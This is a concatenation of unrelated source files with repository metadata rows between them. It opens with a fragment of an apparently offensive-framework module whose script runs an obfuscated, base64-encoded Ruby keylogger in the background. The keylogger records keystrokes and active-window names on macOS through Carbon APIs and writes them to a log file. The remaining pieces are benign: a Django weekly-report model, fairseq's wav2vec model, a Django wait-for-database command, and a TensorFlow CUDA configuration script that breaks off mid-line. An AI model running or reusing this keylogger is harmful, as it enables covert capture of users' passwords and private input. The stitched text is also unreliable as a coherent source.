# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
logFile = self.options['LogFile']['Value']
# base64'ed launcher of ./data/misc/keylogger.rb from MSF
script = """
import os,time
output = os.popen('echo "require \\\'base64\\\';eval(Base64.decode64(\\\'cmVxdWlyZSAndGhyZWFkJwpyZXF1aXJlICdkbCcKcmVxdWlyZSAnZGwvaW1wb3J0JwpJbXBvcnRlciA9IGlmIGRlZmluZWQ/KERMOjpJbXBvcnRlcikgdGhlbiBETDo6SW1wb3J0ZXIgZWxzZSBETDo6SW1wb3J0YWJsZSBlbmQKZGVmIHJ1YnlfMV85X29yX2hpZ2hlcj8KICBSVUJZX1ZFUlNJT04udG9fZiA+PSAxLjkKZW5kCmRlZiBtYWxsb2Moc2l6ZSkKICBpZiBydWJ5XzFfOV9vcl9oaWdoZXI/CiAgICBETDo6Q1B0ci5tYWxsb2Moc2l6ZSkKICBlbHNlCiAgICBETDo6bWFsbG9jKHNpemUpCiAgZW5kCmVuZAppZiBub3QgcnVieV8xXzlfb3JfaGlnaGVyPwogIG1vZHVsZSBETAogICAgbW9kdWxlIEltcG9ydGFibGUKICAgICAgZGVmIG1ldGhvZF9taXNzaW5nKG1ldGgsICphcmdzLCAmYmxvY2spCiAgICAgICAgc3RyID0gbWV0aC50b19zCiAgICAgICAgbG93ZXIgPSBzdHJbMCwxXS5kb3duY2FzZSArIHN0clsxLi4tMV0KICAgICAgICBpZiBzZWxmLnJlc3BvbmRfdG8/IGxvd2VyCiAgICAgICAgICBzZWxmLnNlbmQgbG93ZXIsICphcmdzCiAgICAgICAgZWxzZQogICAgICAgICAgc3VwZXIKICAgICAgICBlbmQKICAgICAgZW5kCiAgICBlbmQKICBlbmQKZW5kClNNX0tDSFJfQ0FDSEUgPSAzOApTTV9DVVJSRU5UX1NDUklQVCA9IC0yCk1BWF9BUFBfTkFNRSA9IDgwCm1vZHVsZSBDYXJib24KICBleHRlbmQgSW1wb3J0ZXIKICBkbGxvYWQgJy9TeXN0ZW0vTGlicmFyeS9GcmFtZXdvcmtzL0NhcmJvbi5mcmFtZXdvcmsvQ2FyYm9uJwogIGV4dGVybiAndW5zaWduZWQgbG9uZyBDb3B5UHJvY2Vzc05hbWUoY29uc3QgUHJvY2Vzc1NlcmlhbE51bWJlciAqLCB2b2lkICopJwogIGV4dGVybiAndm9pZCBHZXRGcm9udFByb2Nlc3MoUHJvY2Vzc1NlcmlhbE51bWJlciAqKScKICBleHRlcm4gJ3ZvaWQgR2V0S2V5cyh2b2lkICopJwogIGV4dGVybiAndW5zaWduZWQgY2hhciAqR2V0U2NyaXB0VmFyaWFibGUoaW50LCBpbnQpJwogIGV4dGVybiAndW5zaWduZWQgY2hhciBLZXlUcmFuc2xhdGUodm9pZCAqLCBpbnQsIHZvaWQgKiknCiAgZXh0ZXJuICd1bnNpZ25lZCBjaGFyIENGU3RyaW5nR2V0Q1N0cmluZyh2b2lkICosIHZvaWQgKiwgaW50LCBpbnQpJwogIGV4dGVybiAnaW50IENGU3RyaW5nR2V0TGVuZ3RoKHZvaWQgKiknCmVuZApwc24gPSBtYWxsb2MoMTYpCm5hbWUgPSBtYWxsb2MoMTYpCm5hbWVfY3N0ciA9IG1hbGxvYyhNQVhfQVBQX05BTUUpCmtleW1hcCA9IG1hbGxvYygxNikKc3RhdGUgPSBtYWxsb2MoOCkKaXR2X3N0YXJ0ID0gVGltZS5ub3cudG9faQpwcmV2X2Rvd24gPSBIYXNoLm5ldyhmYWxzZSkKbGFzdFdpbmRvdyA9ICIiCndoaWxlICh0cnVlKSBkbwogIENhcmJvbi5HZXRGcm9udFByb2Nlc3MocHNuLnJlZikKICBDYXJib24uQ29weVByb2Nlc3NOYW1lKHBzbi5yZWYsIG5hbWUucmVmKQogIENhcmJvbi5HZXRLZXlzKGtleW1hcCkKICBzdHJfbGVuID0gQ2FyYm9uLkNGU3RyaW5nR2V0TGVuZ3RoKG5hbWUpCiAgY29waWVkID0gQ2FyYm9uLkNGU3RyaW5nR2V0Q1N0cmluZyhuYW1lLCBuYW1lX2NzdHIsIE1BWF9BUFBfTkFNRSwgMHgwODAwMDEwMCkgPiAwCiAgYXBwX25hbWUgPSBpZiBjb3BpZWQgdGhlbiBuYW1lX2NzdHIudG9fcyBlbHNlICdVbmtub3duJyBlbmQKICBieXRlcyA9IGtleW1hcC50b19zdHIKICBjYXBfZmxhZyA9IGZhbHNlCiAgYXNjaWkgPSAwCiAgY3RybGNoYXIgPSAiIgogICgwLi4uMTI4KS5lYWNoIGRvIHxrfAogICAgaWYgKChieXRlc1trPj4zXS5vcmQgPj4gKGsmNykpICYgMSA+IDApCiAgICAgIGlmIG5vdCBwcmV2X2Rvd25ba10KICAgICAgICBjYXNlIGsKICAgICAgICAgIHdoZW4gMzYKICAgICAgICAgICAgY3RybGNoYXIgPSAiW2VudGVyXSIKICAgICAgICAgIHdoZW4gNDgKICAgICAgICAgICAgY3RybGNoYXIgPSAiW3RhYl0iCiAgICAgICAgICB3aGVuIDQ5CiAgICAgICAgICAgIGN0cmxjaGFyID0gIiAiCiAgICAgICAgICB3aGVuIDUxCiAgICAgICAgICAgIGN0cmxjaGFyID0gIltkZWxldGVdIgogICAgICAgICAgd2hlbiA1MwogICAgICAgICAgICBjdHJsY2hhciA9ICJbZXNjXSIKICAgICAgICAgIHdoZW4gNTUKICAgICAgICAgICAgY3RybGNoYXIgPSAiW2NtZF0iCiAgICAgICAgICB3aGVuIDU2CiAgICAgICAgICAgIGN0cmxjaGFyID0gIltzaGlmdF0iCiAgICAgICAgICB3aGVuIDU3CiAgICAgICAgICAgIGN0cmxjaGFyID0gIltjYXBzXSIKICAgICAgICAgIHdoZW4gNTgKICAgICAgICAgICAgY3RybGNoYXIgPSAiW29wdGlvbl0iCiAgICAgICAgICB3aGVuIDU5CiAgICAgICAgICAgIGN0cmxjaGFyID0gIltjdHJsXSIKICAgICAgICAgIHdoZW4gNjMKICAgICAgICAgICAgY3RybGNoYXIgPSAiW2ZuXSIKICAgICAgICAgIGVsc2UKICAgICAgICAgICAgY3RybGNoYXIgPSAiIgogICAgICAgIGVuZAogICAgICAgIGlmIGN0cmxjaGFyID09ICIiIGFuZCBhc2NpaSA9PSAwCiAgICAgICAgICBrY2hyID0gQ2FyYm9uLkdldFNjcmlwdFZhcmlhYmxlKFNNX0tDSFJfQ0FDSEUsIFNNX0NVUlJFTlRfU0NSSVBUKQogICAgICAgICAgY3Vycl9hc2NpaSA9IENhcmJvbi5LZXlUcmFuc2xhdGUoa2Nociwgaywgc3RhdGUpCiAgICAgICAgICBjdXJyX2FzY2lpID0gY3Vycl9hc2NpaSA+PiAxNiBpZiBjdXJyX2FzY2lpIDwgMQogICAgICAgICAgcHJldl9kb3duW2tdID0gdHJ1ZQogICAgICAgICAgaWYgY3Vycl9hc2NpaSA9PSAwCiAgICAgICAgICAgIGNhcF9mbGFnID0gdHJ1ZQogICAgICAgICAgZWxzZQogICAgICAgICAgICBhc2NpaSA9IGN1cnJfYXNjaWkKICAgICAgICAgIGVuZAogICAgICAgIGVsc2lmIGN0cmxjaGFyICE9ICIiCiAgICAgICAgICBwcmV2X2Rvd25ba10gPSB0cnVlCiAgICAgICAgZW5kCiAgICAgIGVuZAogICAgZWxzZQogICAgICBwcmV2X2Rvd25ba10gPSBmYWxzZQogICAgZW5kCiAgZW5kCiAgaWYgYXNjaWkgIT0gMCBvciBjdHJsY2hhciAhPSAiIgogICAgaWYgYXBwX25hbWUgIT0gbGFzdFdpbmRvdwogICAgICBwdXRzICJcblxuWyN7YXBwX25hbWV9XSAtIFsje1RpbWUubm93fV1cbiIKICAgICAgbGFzdFdpbmRvdyA9IGFwcF9uYW1lCiAgICBlbmQKICAgIGlmIGN0cmxjaGFyICE9ICIiCiAgICAgIHByaW50ICIje2N0cmxjaGFyfSIKICAgIGVsc2lmIGFzY2lpID4gMzIgYW5kIGFzY2lpIDwgMTI3CiAgICAgIGMgPSBpZiBjYXBfZmxhZyB0aGVuIGFzY2lpLmNoci51cGNhc2UgZWxzZSBhc2NpaS5jaHIgZW5kCiAgICAgIHByaW50ICIje2N9IgogICAgZWxzZQogICAgICBwcmludCAiWyN7YXNjaWl9XSIKICAgIGVuZAogICAgJHN0ZG91dC5mbHVzaAogIGVuZAogIEtlcm5lbC5zbGVlcCgwLjAxKQplbmQK\\\'))" | ruby > %s &').read()
time.sleep(1)
pids = os.popen('ps aux | grep " ruby" | grep -v grep').read()
print pids
print "kill ruby PID and download %s when completed"
""" % (logFile, logFile)
return script
| 87.666667
| 4,547
| 0.814475
|
336917575441f2690e4fc80a9eb5efad81a3f404
| 795
|
py
|
Python
|
mspray/apps/main/models/weekly_report.py
|
onaio/mspray
|
b3e0f4b5855abbf0298de6b66f2e9f472f2bf838
|
[
"Apache-2.0"
] | null | null | null |
mspray/apps/main/models/weekly_report.py
|
onaio/mspray
|
b3e0f4b5855abbf0298de6b66f2e9f472f2bf838
|
[
"Apache-2.0"
] | 76
|
2018-03-15T09:37:56.000Z
|
2019-05-15T12:45:51.000Z
|
mspray/apps/main/models/weekly_report.py
|
onaio/mspray
|
b3e0f4b5855abbf0298de6b66f2e9f472f2bf838
|
[
"Apache-2.0"
] | 1
|
2020-10-31T07:15:22.000Z
|
2020-10-31T07:15:22.000Z
|
# -*- coding=utf-8 -*-
"""
Weekly report model module.
"""
from django.db import models
class WeeklyReport(models.Model):
"""
Weekly report model
"""
week_number = models.PositiveIntegerField()
location = models.ForeignKey('Location', on_delete=models.CASCADE)
structures = models.IntegerField(default=0)
# visited - 20% of the structures have been sprayed in the spray area
visited = models.PositiveIntegerField(default=0)
# sprayed - 20% of the structures have been sprayed in the spray area
sprayed = models.PositiveIntegerField(default=0)
created_on = models.DateTimeField(auto_now_add=True)
modified_on = models.DateTimeField(auto_now=True)
class Meta:
app_label = 'main'
unique_together = ('week_number', 'location')
| 30.576923
| 73
| 0.704403
|
62807764efaa987d930a2690fa456be8295b37db
| 18,388
|
py
|
Python
|
fairseq/models/wav2vec.py
|
theorm/fairseq
|
7a653108cded5aaa69910e9acc0bf9a628f2257b
|
[
"MIT"
] | 239
|
2020-05-12T16:07:49.000Z
|
2022-03-29T20:07:36.000Z
|
fairseq/models/wav2vec.py
|
theorm/fairseq
|
7a653108cded5aaa69910e9acc0bf9a628f2257b
|
[
"MIT"
] | 35
|
2020-11-02T10:53:20.000Z
|
2022-03-18T20:58:07.000Z
|
fairseq/models/wav2vec.py
|
theorm/fairseq
|
7a653108cded5aaa69910e9acc0bf9a628f2257b
|
[
"MIT"
] | 38
|
2020-11-07T19:23:25.000Z
|
2022-03-31T08:56:33.000Z
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import sys
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from . import (
BaseFairseqModel, register_model, register_model_architecture
)
@register_model('wav2vec')
class Wav2VecModel(BaseFairseqModel):
@staticmethod
def add_args(parser):
"""Add model-specific arguments to the parser."""
parser.add_argument('--prediction-steps', type=int, metavar='N', help='number of steps ahead to predict')
parser.add_argument('--sample-distance', type=int, metavar='N',
help='sample distance from target. does not work properly with cross-sampling')
parser.add_argument('--cross-sample-negatives', action='store_true',
help='whether to sample negatives across examples in the same batch')
parser.add_argument('--num-negatives', type=int, metavar='N', help='number of negative examples')
parser.add_argument('--conv-feature-layers', type=str, metavar='EXPR',
help='convolutional feature extraction layers [(dim, kernel_size, stride), ...]')
parser.add_argument('--conv-aggregator-layers', type=str, metavar='EXPR',
help='convolutional feature extraction layers [(dim, kernel_size, stride), ...]')
parser.add_argument('--dropout', type=float, metavar='D', help='dropout to apply within the model')
parser.add_argument('--dropout-features', type=float, metavar='D', help='dropout to apply to the features')
parser.add_argument('--dropout-agg', type=float, metavar='D', help='dropout to apply after aggregation step')
parser.add_argument('--encoder', type=str, choices=['cnn'], help='type of encoder to use')
parser.add_argument('--aggregator', type=str, choices=['cnn', 'gru'],
help='type of aggregator to use')
parser.add_argument('--gru-dim', type=int, metavar='N', help='GRU dimensionality')
parser.add_argument('--no-conv-bias', action='store_true',
help='if set, does not learn bias for conv layers')
parser.add_argument('--agg-zero-pad', action='store_true',
help='if set, zero pads in aggregator instead of repl pad')
parser.add_argument('--skip-connections-feat', action='store_true',
help='if set, adds skip connections to the feature extractor')
parser.add_argument('--skip-connections-agg', action='store_true',
help='if set, adds skip connections to the aggregator')
parser.add_argument('--residual-scale', type=float, metavar='D',
help='scales residual by sqrt(value)')
parser.add_argument('--log-compression', action='store_true',
help='if set, adds a log compression to feature extractor')
parser.add_argument('--balanced-classes', action='store_true',
help='if set, loss is scaled to balance for number of negatives')
parser.add_argument('--project-features', choices=['none', 'same', 'new'],
help='if not none, features are projected using the (same or new) aggregator')
parser.add_argument('--non-affine-group-norm', action='store_true',
help='if set, group norm is not affine')
parser.add_argument('--offset', help='if set, introduces an offset from target to predictions. '
'if set to "auto", it is computed automatically from the receptive field')
@classmethod
def build_model(cls, args, task):
"""Build a new model instance."""
# make sure all arguments are present in older models
base_wav2vec_architecture(args)
model = Wav2VecModel(args)
print(model)
return model
def __init__(self, args):
super().__init__()
self.prediction_steps = args.prediction_steps
offset = args.offset
if args.encoder == 'cnn':
feature_enc_layers = eval(args.conv_feature_layers)
self.feature_extractor = ConvFeatureExtractionModel(
conv_layers=feature_enc_layers,
dropout=0.,
log_compression=args.log_compression,
skip_connections=args.skip_connections_feat,
residual_scale=args.residual_scale,
non_affine_group_norm=args.non_affine_group_norm,
)
embed = feature_enc_layers[-1][0]
else:
raise Exception('unknown encoder type ' + args.encoder)
if args.offset == 'auto':
assert args.encoder == 'cnn'
jin = 0
rin = 0
for _, k, stride in feature_enc_layers:
if rin == 0:
rin = k
rin = rin + (k - 1) * jin
if jin == 0:
jin = stride
else:
jin *= stride
offset = math.ceil(rin / jin)
offset = int(offset)
def make_aggregator():
if args.aggregator == 'cnn':
agg_layers = eval(args.conv_aggregator_layers)
agg_dim = agg_layers[-1][0]
feature_aggregator = ConvAggegator(
conv_layers=agg_layers,
embed=embed,
dropout=args.dropout,
skip_connections=args.skip_connections_agg,
residual_scale=args.residual_scale,
non_affine_group_norm=args.non_affine_group_norm,
conv_bias=not args.no_conv_bias,
zero_pad=args.agg_zero_pad,
)
elif args.aggregator == 'gru':
agg_dim = args.gru_dim
feature_aggregator = nn.Sequential(
TransposeLast(),
nn.GRU(
input_size=embed,
hidden_size=agg_dim,
num_layers=1,
dropout=args.dropout,
),
TransposeLast(deconstruct_idx=0),
)
else:
raise Exception('unknown aggregator type ' + args.aggregator)
return feature_aggregator, agg_dim
self.feature_aggregator, agg_dim = make_aggregator()
self.wav2vec_predictions = Wav2VecPredictionsModel(
in_dim=agg_dim,
out_dim=embed,
prediction_steps=args.prediction_steps,
n_negatives=args.num_negatives,
cross_sample_negatives=args.cross_sample_negatives,
sample_distance=args.sample_distance,
dropout=args.dropout,
offset=offset,
balanced_classes=args.balanced_classes,
)
self.dropout_feats = nn.Dropout(p=args.dropout_features)
self.dropout_agg = nn.Dropout(p=args.dropout_agg)
if args.project_features == 'none':
self.project_features = None
elif args.project_features == 'same':
self.project_features = self.feature_aggregator
elif args.project_features == 'new':
self.project_features, _ = make_aggregator()
def forward(self, source):
result = {}
features = self.feature_extractor(source)
x = self.dropout_feats(features)
x = self.feature_aggregator(x)
x = self.dropout_agg(x)
if self.project_features is not None:
features = self.project_features(features)
x, targets = self.wav2vec_predictions(x, features)
result['cpc_logits'] = x
result['cpc_targets'] = targets
return result
def upgrade_state_dict_named(self, state_dict, name):
return state_dict
def max_positions(self):
"""Maximum length supported by the model."""
return sys.maxsize
def get_logits(self, net_output):
logits = net_output['cpc_logits']
return logits
def get_targets(self, sample, net_output, expand_steps=True):
t = net_output['cpc_targets']
return t.contiguous()
def get_target_weights(self, targets, net_output):
targets = net_output['cpc_targets']
if isinstance(targets, tuple) and targets[-1] is not None:
return targets[-1]
return 1.
class TransposeLast(nn.Module):
def __init__(self, deconstruct_idx=None):
super().__init__()
self.deconstruct_idx = deconstruct_idx
def forward(self, x):
if self.deconstruct_idx is not None:
x = x[self.deconstruct_idx]
return x.transpose(-2, -1)
class Fp32GroupNorm(nn.GroupNorm):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def forward(self, input):
output = F.group_norm(
input.float(), self.num_groups, self.weight.float() if self.weight is not None else None,
self.bias.float() if self.bias is not None else None, self.eps)
return output.type_as(input)
class Fp32LayerNorm(nn.LayerNorm):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def forward(self, input):
output = F.layer_norm(
input.float(), self.normalized_shape, self.weight.float() if self.weight is not None else None,
self.bias.float() if self.bias is not None else None, self.eps)
return output.type_as(input)
def norm_block(is_layer_norm, dim, affine=True):
if is_layer_norm:
mod = nn.Sequential(
TransposeLast(),
Fp32LayerNorm(dim, elementwise_affine=affine),
TransposeLast(),
)
else:
mod = Fp32GroupNorm(1, dim, affine=affine)
return mod
class ConvFeatureExtractionModel(nn.Module):
def __init__(self, conv_layers, dropout, log_compression, skip_connections, residual_scale, non_affine_group_norm):
super().__init__()
def block(n_in, n_out, k, stride):
return nn.Sequential(
nn.Conv1d(n_in, n_out, k, stride=stride, bias=False),
nn.Dropout(p=dropout),
norm_block(is_layer_norm=False, dim=n_out, affine=not non_affine_group_norm),
nn.ReLU(),
)
in_d = 1
self.conv_layers = nn.ModuleList()
for i, (dim, k, stride) in enumerate(conv_layers):
self.conv_layers.append(
block(in_d, dim, k, stride))
in_d = dim
self.log_compression = log_compression
self.skip_connections = skip_connections
self.residual_scale = math.sqrt(residual_scale)
def forward(self, x):
# BxT -> BxCxT
x = x.unsqueeze(1)
for conv in self.conv_layers:
residual = x
x = conv(x)
if self.skip_connections and x.size(1) == residual.size(1):
tsz = x.size(2)
r_tsz = residual.size(2)
residual = residual[..., ::r_tsz // tsz][..., :tsz]
x = (x + residual) * self.residual_scale
if self.log_compression:
x = x.abs()
x = x + 1
x = x.log()
return x
class ZeroPad1d(nn.Module):
def __init__(self, pad_left, pad_right):
super().__init__()
self.pad_left = pad_left
self.pad_right = pad_right
def forward(self, x):
return F.pad(x, (self.pad_left, self.pad_right))
class ConvAggegator(nn.Module):
def __init__(self, conv_layers, embed, dropout, skip_connections, residual_scale, non_affine_group_norm, conv_bias,
zero_pad):
super().__init__()
def block(n_in, n_out, k, stride):
# padding dims only really make sense for stride = 1
ka = k // 2
kb = ka - 1 if k % 2 == 0 else ka
pad = ZeroPad1d(ka + kb, 0) if zero_pad else nn.ReplicationPad1d((ka + kb, 0))
return nn.Sequential(
pad,
nn.Conv1d(n_in, n_out, k, stride=stride, bias=conv_bias),
nn.Dropout(p=dropout),
norm_block(False, n_out, affine=not non_affine_group_norm),
nn.ReLU(),
)
in_d = embed
self.conv_layers = nn.ModuleList()
self.residual_proj = nn.ModuleList()
for i, (dim, k, stride) in enumerate(conv_layers):
if in_d != dim and skip_connections:
self.residual_proj.append(
nn.Conv1d(in_d, dim, 1, bias=False),
)
else:
self.residual_proj.append(None)
self.conv_layers.append(
block(in_d, dim, k, stride))
in_d = dim
self.conv_layers = nn.Sequential(*self.conv_layers)
self.skip_connections = skip_connections
self.residual_scale = math.sqrt(residual_scale)
def forward(self, x):
for rproj, conv in zip(self.residual_proj, self.conv_layers):
residual = x
x = conv(x)
if self.skip_connections:
if rproj is not None:
residual = rproj(residual)
x = (x + residual) * self.residual_scale
return x
class Wav2VecPredictionsModel(nn.Module):
def __init__(self, in_dim, out_dim, prediction_steps, n_negatives, cross_sample_negatives, sample_distance,
dropout, offset, balanced_classes):
super().__init__()
self.n_negatives = n_negatives
self.cross_sample_negatives = cross_sample_negatives
self.sample_distance = sample_distance
self.project_to_steps = nn.ConvTranspose2d(in_dim, out_dim, (1, prediction_steps))
self.dropout = nn.Dropout(p=dropout)
self.offset = offset
self.balanced_classes = balanced_classes
def sample_negatives(self, y):
bsz, fsz, tsz = y.shape
y = y.transpose(0, 1) # BCT -> CBT
y = y.contiguous().view(fsz, -1) # CBT => C(BxT)
if self.cross_sample_negatives:
high = tsz * bsz
assert self.sample_distance is None, 'sample distance is not supported with cross sampling'
else:
high = tsz if self.sample_distance is None else min(tsz, self.sample_distance)
neg_idxs = torch.randint(low=0, high=high, size=(bsz, self.n_negatives * tsz))
if self.sample_distance is not None and self.sample_distance < tsz:
neg_idxs += torch.cat(
[torch.arange(start=1, end=tsz - self.sample_distance, device=neg_idxs.device, dtype=neg_idxs.dtype),
torch.arange(start=tsz - self.sample_distance, end=tsz - self.sample_distance * 2 - 1, step=-1,
device=neg_idxs.device, dtype=neg_idxs.dtype)])
if not self.cross_sample_negatives:
for i in range(1, bsz):
neg_idxs[i] += i * high
negs = y[..., neg_idxs.view(-1)]
negs = negs.view(fsz, bsz, self.n_negatives, tsz).permute(2, 1, 0, 3) # to NxBxCxT
return negs
def forward(self, x, y):
negatives = self.sample_negatives(y)
y = y.unsqueeze(0)
targets = torch.cat([y, negatives], dim=0)
x = x.unsqueeze(-1)
x = self.project_to_steps(x) # BxCxTxS
x = self.dropout(x)
x = x.unsqueeze(0).expand(targets.size(0), -1, -1, -1, -1)
copies, bsz, dim, tsz, steps = x.shape
steps = min(steps, tsz - self.offset)
predictions = x.new(bsz * copies * (tsz - self.offset + 1) * steps - ((steps + 1) * steps // 2) * copies * bsz)
labels = torch.zeros_like(predictions)
weights = torch.full_like(labels, 1 / self.n_negatives) if self.balanced_classes else None
start = end = 0
for i in range(steps):
offset = i + self.offset
end = start + (tsz - offset) * bsz * copies
pos_num = (end - start) // copies
predictions[start:end] = (x[..., :-offset, i] * targets[..., offset:]).sum(dim=2).flatten()
labels[start:start + pos_num] = 1.
if weights is not None:
weights[start:start + pos_num] = 1.
start = end
assert end == predictions.numel(), '{} != {}'.format(end, predictions.numel())
if weights is not None:
labels = (labels, weights)
return predictions, labels
@register_model_architecture('wav2vec', 'wav2vec')
def base_wav2vec_architecture(args):
conv_feature_layers = '[(512, 10, 5)]'
conv_feature_layers += ' + [(512, 8, 4)]'
conv_feature_layers += ' + [(512, 4, 2)] * 3'
args.conv_feature_layers = getattr(args, 'conv_feature_layers', conv_feature_layers)
args.conv_aggregator_layers = getattr(args, 'conv_aggregator_layers', '[(512, 3, 1)] * 9')
args.prediction_steps = getattr(args, 'prediction_steps', 12)
args.num_negatives = getattr(args, 'num_negatives', 1)
args.sample_distance = getattr(args, 'sample_distance', None)
args.cross_sample_negatives = getattr(args, 'cross_sample_negatives', False)
args.dropout = getattr(args, 'dropout', 0.)
args.dropout_features = getattr(args, 'dropout_features', 0.)
args.dropout_agg = getattr(args, 'dropout_agg', 0.)
args.encoder = getattr(args, 'encoder', 'cnn')
args.aggregator = getattr(args, 'aggregator', 'cnn')
args.skip_connections_feat = getattr(args, 'skip_connections_feat', False)
args.skip_connections_agg = getattr(args, 'skip_connections_agg', False)
args.residual_scale = getattr(args, 'residual_scale', 0.5)
args.gru_dim = getattr(args, 'gru_dim', 512)
args.no_conv_bias = getattr(args, 'no_conv_bias', False)
args.agg_zero_pad = getattr(args, 'agg_zero_pad', False)
args.log_compression = getattr(args, 'log_compression', False)
args.balanced_classes = getattr(args, 'balanced_classes', False)
args.project_features = getattr(args, 'project_features', 'none')
args.non_affine_group_norm = getattr(args, 'non_affine_group_norm', False)
args.offset = getattr(args, 'offset', 'auto')
| 38.793249
| 119
| 0.596422
|
d737774990b5c16b6c0a1030eb607d172755666f
| 670
|
py
|
Python
|
app/core/management/commands/wait_for_db.py
|
qwerty1199/recipe-app-api
|
36acf8181513548b06bd371221182ac32964a49b
|
[
"MIT"
] | null | null | null |
app/core/management/commands/wait_for_db.py
|
qwerty1199/recipe-app-api
|
36acf8181513548b06bd371221182ac32964a49b
|
[
"MIT"
] | null | null | null |
app/core/management/commands/wait_for_db.py
|
qwerty1199/recipe-app-api
|
36acf8181513548b06bd371221182ac32964a49b
|
[
"MIT"
] | null | null | null |
import time
from django.db import connections
from django.db.utils import OperationalError
from django.core.management.base import BaseCommand
class Command(BaseCommand):
"""Django command to pause execution until the db is available"""
def handle(self, *args, **options):
self.stdout.write('Waiting for database...')
db_conn = None
while not db_conn:
try:
db_conn = connections['default']
except OperationalError:
self.stdout.write('Database unavailable, wait for 1 second...')
time.sleep(1)
self.stdout.write(self.style.SUCCESS('Database available!'))
| 31.904762
| 79
| 0.649254
|
83a377dde5c74806855de4264ebf0c2d557bffa0
| 40,788
|
bzl
|
Python
|
third_party/gpus/cuda_configure.bzl
|
shreyanshp/tensorflow
|
77867318b3c89e38828e787f3948ccae21bc0693
|
[
"Apache-2.0"
] | null | null | null |
third_party/gpus/cuda_configure.bzl
|
shreyanshp/tensorflow
|
77867318b3c89e38828e787f3948ccae21bc0693
|
[
"Apache-2.0"
] | null | null | null |
third_party/gpus/cuda_configure.bzl
|
shreyanshp/tensorflow
|
77867318b3c89e38828e787f3948ccae21bc0693
|
[
"Apache-2.0"
] | null | null | null |
# -*- Python -*-
"""Repository rule for CUDA autoconfiguration.
`cuda_configure` depends on the following environment variables:
* `TF_NEED_CUDA`: Whether to enable building with CUDA.
* `GCC_HOST_COMPILER_PATH`: The GCC host compiler path
* `TF_CUDA_CLANG`: Whether to use clang as a cuda compiler.
* `CLANG_CUDA_COMPILER_PATH`: The clang compiler path that will be used for
both host and device code compilation if TF_CUDA_CLANG is 1.
* `CUDA_TOOLKIT_PATH`: The path to the CUDA toolkit. Default is
`/usr/local/cuda`.
* `TF_CUDA_VERSION`: The version of the CUDA toolkit. If this is blank, then
use the system default.
* `TF_CUDNN_VERSION`: The version of the cuDNN library.
* `CUDNN_INSTALL_PATH`: The path to the cuDNN library. Default is
`/usr/local/cuda`.
* `TF_CUDA_COMPUTE_CAPABILITIES`: The CUDA compute capabilities. Default is
`3.5,5.2`.
"""
_GCC_HOST_COMPILER_PATH = "GCC_HOST_COMPILER_PATH"
_CLANG_CUDA_COMPILER_PATH = "CLANG_CUDA_COMPILER_PATH"
_CUDA_TOOLKIT_PATH = "CUDA_TOOLKIT_PATH"
_TF_CUDA_VERSION = "TF_CUDA_VERSION"
_TF_CUDNN_VERSION = "TF_CUDNN_VERSION"
_CUDNN_INSTALL_PATH = "CUDNN_INSTALL_PATH"
_TF_CUDA_COMPUTE_CAPABILITIES = "TF_CUDA_COMPUTE_CAPABILITIES"
_TF_CUDA_CONFIG_REPO = "TF_CUDA_CONFIG_REPO"
_DEFAULT_CUDA_VERSION = ""
_DEFAULT_CUDNN_VERSION = ""
_DEFAULT_CUDA_TOOLKIT_PATH = "/usr/local/cuda"
_DEFAULT_CUDNN_INSTALL_PATH = "/usr/local/cuda"
_DEFAULT_CUDA_COMPUTE_CAPABILITIES = ["3.5", "5.2"]
# TODO(dzc): Once these functions have been factored out of Bazel's
# cc_configure.bzl, load them from @bazel_tools instead.
# BEGIN cc_configure common functions.
def find_cc(repository_ctx):
"""Find the C++ compiler."""
# On Windows, we use Bazel's MSVC CROSSTOOL for GPU build
# Return a dummy value for GCC detection here to avoid error
if _is_windows(repository_ctx):
return "/use/--config=win-cuda --cpu=x64_windows_msvc/instead"
if _use_cuda_clang(repository_ctx):
target_cc_name = "clang"
cc_path_envvar = _CLANG_CUDA_COMPILER_PATH
else:
target_cc_name = "gcc"
cc_path_envvar = _GCC_HOST_COMPILER_PATH
cc_name = target_cc_name
if cc_path_envvar in repository_ctx.os.environ:
cc_name_from_env = repository_ctx.os.environ[cc_path_envvar].strip()
if cc_name_from_env:
cc_name = cc_name_from_env
if cc_name.startswith("/"):
# Absolute path, maybe we should make this supported by our which function.
return cc_name
cc = repository_ctx.which(cc_name)
if cc == None:
fail(("Cannot find {}, either correct your path or set the {}" +
" environment variable").format(target_cc_name, cc_path_envvar))
return cc
_INC_DIR_MARKER_BEGIN = "#include <...>"
# OSX add " (framework directory)" at the end of line, strip it.
_OSX_FRAMEWORK_SUFFIX = " (framework directory)"
_OSX_FRAMEWORK_SUFFIX_LEN = len(_OSX_FRAMEWORK_SUFFIX)
def _cxx_inc_convert(path):
"""Convert path returned by cc -E xc++ in a complete path."""
path = path.strip()
if path.endswith(_OSX_FRAMEWORK_SUFFIX):
path = path[:-_OSX_FRAMEWORK_SUFFIX_LEN].strip()
return path
def _get_cxx_inc_directories_impl(repository_ctx, cc, lang_is_cpp):
"""Compute the list of default C or C++ include directories."""
if lang_is_cpp:
lang = "c++"
else:
lang = "c"
# TODO: We pass -no-canonical-prefixes here to match the compiler flags,
# but in cuda_clang CROSSTOOL file that is a `feature` and we should
# handle the case when it's disabled and no flag is passed
result = repository_ctx.execute([cc, "-no-canonical-prefixes",
"-E", "-x" + lang, "-", "-v"])
index1 = result.stderr.find(_INC_DIR_MARKER_BEGIN)
if index1 == -1:
return []
index1 = result.stderr.find("\n", index1)
if index1 == -1:
return []
index2 = result.stderr.rfind("\n ")
if index2 == -1 or index2 < index1:
return []
index2 = result.stderr.find("\n", index2 + 1)
if index2 == -1:
inc_dirs = result.stderr[index1 + 1:]
else:
inc_dirs = result.stderr[index1 + 1:index2].strip()
return [repository_ctx.path(_cxx_inc_convert(p))
for p in inc_dirs.split("\n")]
def get_cxx_inc_directories(repository_ctx, cc):
"""Compute the list of default C and C++ include directories."""
# For some reason `clang -xc` sometimes returns include paths that are
# different from the ones from `clang -xc++`. (Symlink and a dir)
# So we run the compiler with both `-xc` and `-xc++` and merge resulting lists
includes_cpp = _get_cxx_inc_directories_impl(repository_ctx, cc, True)
includes_c = _get_cxx_inc_directories_impl(repository_ctx, cc, False)
includes_cpp_set = set(includes_cpp)
return includes_cpp + [inc for inc in includes_c
